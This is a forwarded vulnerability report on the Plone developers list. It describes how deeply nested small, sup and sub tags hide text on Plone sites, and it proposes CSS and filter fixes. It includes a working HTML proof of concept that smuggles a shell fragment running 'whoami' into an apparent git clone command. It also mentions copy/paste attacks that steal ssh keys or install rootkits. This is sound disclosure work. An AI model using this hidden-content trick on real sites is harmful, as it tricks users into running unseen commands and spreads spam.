Fwd: hidden web content security issue (small/sup/sub default css managment)

Matthew Wilkes <[email protected]>
Newsgroups gmane.comp.web.zope.plone.devel
Message-ID <[email protected]>
Hi all,

I'm passing this on to you all as a potential bug. We on the sec team 
decided it'd be better handled here. I'd recommend avoiding fiddling 
with safe_html if you value your sanity, though.

Matt

-------- Original Message --------
Delivered-To: [email protected]
Received: by 10.182.246.227 with SMTP id xz3csp47904obc;        Sat, 18 
Jan 2014 16:45:32 -0800 (PST)
X-Received: by 10.15.82.67 with SMTP id 
z43mr10211032eey.60.1390092332039;        Sat, 18 Jan 2014 16:45:32 
-0800 (PST)
Return-Path: <[email protected]>
Received: from mail-ea0-f197.google.com (mail-ea0-f197.google.com 
[209.85.215.197])        by mx.google.com with ESMTPS id 
d46si15744915eeo.249.2014.01.18.16.45.31        for 
<[email protected]>        (version=TLSv1 
cipher=ECDHE-RSA-RC4-SHA bits=128/128);        Sat, 18 Jan 2014 16:45:32 
-0800 (PST)
Received-SPF: softfail (google.com: domain of transitioning 
[email protected] does not designate 
88.190.208.98 as permitted sender) client-ip=88.190.208.98;
Authentication-Results: mx.google.com;       spf=softfail (google.com: 
domain of transitioning 
[email protected] does not designate 
88.190.208.98 as permitted sender) 
[email protected]
Received: by mail-ea0-f197.google.com with SMTP id b10sf8549418eae.8 
     for <[email protected]>; Sat, 18 Jan 2014 16:45:31 -0800 (PST)
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; 
d=1e100.net; s=20130820; 
h=x-gm-message-state:message-id:date:from:user-agent:mime-version:to 
      :subject:dkim-filter:dkim-filter:x-original-sender 
:x-original-authentication-results:precedence:mailing-list:list-id 
    :list-help:content-type:content-transfer-encoding; 
bh=7F3swCoM2cY/3GzlZtO+BDUDPSm53NwjCoVMmYYH1iE=; 
b=BCGheWpfy0aTO37wreN+kcv0jE935vhCAEXZKEZfOTB7vtm3BcLEnTsHjKTbxYsNlX 
 
YEu/gAfMipozHfpN96OUY6hRlLZFpmuxcLJmM/wrsAZ5CdJx3LDDKI7k0dN14Xs+hB+K 
 
oBCxakI9YW8IhDCSycNvO4/ViyCJm7InBHzQUa9k0Q2hTZjtKM9drMcKI5EXWseHOLfs 
 
45hciDkLy8FPsja0eQ/Zh6F6psubjewJ8rhUO8lXvU9BLHZxb4a7ZlSlvTHqaeTH+pHII7aEE 
 
6nK2edPG57KJjF7lgbhtUvGzF1UsZxiUMwu2zztQYpTOHAjh2sWLTeL7Mg54Oi/u21x9 
      2+Sg==
X-Gm-Message-State: 
ALoCoQlcF/VTp8f5AqTXJyab4FqV1tg3KJJvxI2WDEhOkTlRZ+8uJ51xt4HlJfz8XO0FDxaP8Ese
X-Received: by 10.180.19.66 with SMTP id c2mr2974736wie.7.1390092331334; 
        Sat, 18 Jan 2014 16:45:31 -0800 (PST)
X-BeenThere: [email protected]
Received: by 10.180.75.206 with SMTP id e14ls44799wiw.18.canary; Sat, 18 
Jan 2014 16:45:31 -0800 (PST)
X-Received: by 10.194.82.105 with SMTP id 
h9mr279357wjy.52.1390092331053;        Sat, 18 Jan 2014 16:45:31 -0800 (PST)
Received: from mxrelay.makina-corpus.com (mxrelay.makina-corpus.com. 
[88.190.208.98])        by mx.google.com with ESMTP id 
gj10si2120247wib.86.2014.01.18.16.45.30        for <[email protected]>; 
        Sat, 18 Jan 2014 16:45:30 -0800 (PST)
Received-SPF: pass (google.com: domain of [email protected] 
designates 88.190.208.98 as permitted sender) client-ip=88.190.208.98;
Received: from localhost (localhost.localdomain [127.0.0.1]) by 
mxrelay.makina-corpus.com (Postfix) with ESMTP id 8B07E80CCD for 
<[email protected]>; Sun, 19 Jan 2014 01:45:00 +0100 (CET)
X-Virus-Scanned: amavisd-new at makina-corpus.com
Received: from mxrelay.makina-corpus.com ([127.0.0.1]) by localhost 
(mxrelay.makina-corpus.com [127.0.0.1]) (amavisd-new, port 10024) with 
ESMTP id lC5bWZWwNf-x for <[email protected]>; Sun, 19 Jan 2014 
01:44:59 +0100 (CET)
Received: from mail.makina-corpus.com (mail.makina-corpus.com 
[212.83.188.243]) by mxrelay.makina-corpus.com (Postfix) with ESMTP id 
6A22180CCC for <[email protected]>; Sun, 19 Jan 2014 01:44:59 +0100 (CET)
Received: from [192.168.1.52] (ANantes-656-1-6-186.w2-9.abo.wanadoo.fr 
[2.9.21.186]) (Authenticated sender: [email protected]) by 
mail.makina-corpus.com (Postfix) with ESMTPSA id 4025920BD9 for 
<[email protected]>; Sun, 19 Jan 2014 01:44:59 +0100 (CET)
Message-ID: <[email protected]>
Date: Sun, 19 Jan 2014 01:45:30 +0100
From: Régis Leroy <[email protected]>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20131103 
Icedove/17.0.10
MIME-Version: 1.0
To: [email protected]
Subject: hidden web content security issue (small/sup/sub default css 
managment)
X-Enigmail-Version: 1.5.1
DKIM-Filter: OpenDKIM Filter v2.8.4 mxrelay.makina-corpus.com 6A22180CCC
DKIM-Filter: OpenDKIM Filter v2.8.4 mxrelay.makina-corpus.com 8B07E80CCD
X-Original-Sender: [email protected]
X-Original-Authentication-Results: mx.google.com;       spf=pass 
(google.com: domain of [email protected] designates 
88.190.208.98 as permitted sender) [email protected]
Precedence: list
Mailing-list: list [email protected]; contact [email protected]
List-ID: <security.plone.org>
X-Google-Group-Id: 100390162868
List-Help: 
<http://support.google.com/a/plone.org/bin/topic.py&topic=25838>, 
<mailto:[email protected]>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hello,

Summary:
=======

small, sup and sub tags are allowed in most default contributors filters
(safe HTML and Kupu -- but Kupu removes small). The default plone css
does not add any instructions and the default browser "font-size:
smaller" is used. This could be used to hide some content with
font-size: 0px using several encapsulated small,sup or sub tags.

This makes any plone website allowing external contributions usable for
hidden content attacks.

Security level of this issue is not very high, but that's still a
security issue and some plone users may get more trouble with this than
others.

Exploitation:
===============
Hidden content could be used in several ways:

  * SEO : comments on well referenced pages linking to evil websites
  * copy/paste attacks: make the user copy an harmless command in a
terminal,then use it to do evil things on his name ( downloading
rootkits, copying ssh keys, introducing xss vectors on other website,
etc). Refer to
http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt
for details.

Method:
========

Encapsulate content in a lot of small,sup or sub HTML markup.


Example:
======

I've used http://plonedemo.com and added this example:
"""
<p><small>small</small>test
<small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><sma

  l
l><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small>smaller
text, but it's quite a very long one, so it should still be visible to
avoid any security
problem</small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small

  >
</small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small>
with hidden sentence.</p>
<p>This is a security test:<br /> please do not copy/paste git clone
<sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup><sup>/dev/null;
clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThis is an hidden
content.'git
clone</sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup></sup>
https://github.com/github/developer.github.com.git
<sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub><sub>
help; This is a second hidden content for SEO https://help.github.com/
</sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub></sub>
help</p>
<p>This is the end.</p>
"""

Impact
======

  * Chrome 31.0.1650.63  is completly hiding the content.
  * Firefox 17.0.10 show 1px garbage content (good point)

Impact of the attack is mitigated by the fact no { font-size: 80% } is
defined in the default css, so the browser defaults are used ( {
font-size: smaller } ).

But for any derivated theme which would use this trick (font reduction
with percentage) even firtefox would completly hide the content. This is
something used on a lot of derivated themes, especially when people add
a reste.css which usually contains a default font-size: 100% for small
sub and sup.
The { font-size: smaller } is a little harder to hack.


I did not test IE or other browsers.

Fix
===

One working css fix is:

sup sup, sub sub { font-size: 100%; position: relative; top: 0; bottom: 0 }

This could be added on the default Plone theme.

Another fix could be removing support for small, sub and sup tags (or
move them in the removed tags where content is not removed for Safe HTML
filter) support, or an deep-encapsulation detection (but html parsers
are hard to code, they need to support all the formatting errors that
browsers could allow)




------------------------------------------------------------------------------
CenturyLink Cloud: The Leader in Enterprise Cloud Services.
Learn Why More Businesses Are Choosing CenturyLink Cloud For
Critical Workloads, Development Environments & Everything In Between.
Get a Quote or Start a Free Trial Today. 
http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
_______________________________________________
Plone-developers mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/plone-developers
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.